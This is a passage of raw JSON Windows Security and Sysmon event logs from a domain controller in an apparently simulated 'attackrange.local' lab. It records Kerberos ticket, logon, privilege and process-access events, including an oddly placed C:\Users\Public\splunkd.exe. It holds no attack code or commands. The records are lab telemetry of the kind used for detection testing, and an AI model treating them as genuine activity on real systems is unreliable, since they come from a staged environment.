Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{956FED91-BC05-21D4-656B-8DEC1409A64A}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220469,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{956FED91-BC05-21D4-656B-8DEC1409A64A}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{956FED91-BC05-21D4-656B-8DEC1409A64A}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220470,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x68F28\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{956FED91-BC05-21D4-656B-8DEC1409A64A}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x68f28","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{956FED91-BC05-21D4-656B-8DEC1409A64A}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220471,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x68F28\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x68f28","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4772,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.442\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.442","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4773,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.442\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.442","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4774,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.520\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.520","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4775,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.568\r\nProcessGuid: {E2A3D6B1-11C0-5F25-0000-0010A58F0600}\r\nProcessId: 5032\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.568","ProcessGuid":"{E2A3D6B1-11C0-5F25-0000-0010A58F0600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4776,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.567\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-11C0-5F25-0000-0010A58F0600}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.567","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-11C0-5F25-0000-0010A58F0600}","TargetProcessId":"5032","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
